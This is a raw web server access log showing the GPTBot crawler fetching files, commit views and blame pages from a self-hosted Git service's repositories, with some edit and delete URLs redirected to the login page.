[Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/BatchControl.png" +[17/Feb/2026:17:09:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 9849] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/instrument.png" +[17/Feb/2026:17:09:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/BatchControl.png" +[17/Feb/2026:17:09:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 960] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/instrument.png" +[17/Feb/2026:17:09:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/instrument.png" +[17/Feb/2026:17:09:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10095] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:17:09:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:17:09:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:17:09:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14031] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:17:09:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:17:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh?display=rendered" [Client 74.7.227.38] [Length 11000] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:17:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate?display=rendered" [Client 74.7.227.38] [Length 10967] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:17:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1?display=rendered" [Client 74.7.227.38] [Length 10976] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:17:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.fish?display=rendered" [Client 74.7.227.38] [Length 10977] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:17:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/Activate.ps1?display=source" [Client 74.7.227.38] [Length 19904] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:17:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/websockets?display=source" [Client 74.7.227.38] [Length 11528] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:17:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish?display=rendered" [Client 74.7.227.38] [Length 11005] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:17:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/Activate.ps1?display=rendered" [Client 74.7.227.38] [Length 11006] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:17:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:17:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16704] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components" +[17/Feb/2026:17:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 9784] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:17:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 9785] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:17:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService%2fappsettings.Development.json" [Client 74.7.227.38] [Length 21423] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json" +[17/Feb/2026:17:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/labels?sort=mostissues&state=" [Client 74.7.227.38] [Length 7659] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/labels" +[17/Feb/2026:17:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Program.cs?display=rendered" [Client 74.7.227.38] [Length 11145] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Program.cs" +[17/Feb/2026:17:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.nuget.cache?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.nuget.cache" +[17/Feb/2026:17:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Worker.cs?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Worker.cs" +[17/Feb/2026:17:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9952] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:17:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 9809] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:17:09:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js" +[17/Feb/2026:17:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/static/js" +[17/Feb/2026:17:09:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Contact.tsx" +[17/Feb/2026:17:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/components/Contact.tsx" +[17/Feb/2026:17:09:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Contact.tsx" +[17/Feb/2026:17:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/components/Contact.tsx" +[17/Feb/2026:17:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9792] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Contact.tsx" +[17/Feb/2026:17:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 17246] [Gzip 8.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Contact.tsx" +[17/Feb/2026:17:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Contact.tsx" +[17/Feb/2026:17:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Contact.tsx" +[17/Feb/2026:17:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13731] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:17:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13734] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:17:09:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13733] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:17:09:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13986] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx" +[17/Feb/2026:17:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10954] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx" +[17/Feb/2026:17:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15604] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:17:09:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/BuildTip.txt?display=source" [Client 74.7.227.38] [Length 11385] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:17:09:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png" +[17/Feb/2026:17:09:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/Contact.tsx" +[17/Feb/2026:17:09:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/components/Contact.tsx" +[17/Feb/2026:17:09:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/Contact.tsx" +[17/Feb/2026:17:09:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/components/Contact.tsx" +[17/Feb/2026:17:09:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/instrument.png?display=rendered" [Client 74.7.227.38] [Length 10905] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/instrument.png" +[17/Feb/2026:17:09:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:17:09:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:17:09:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:17:09:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html?display=source" [Client 74.7.227.38] [Length 14410] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html" 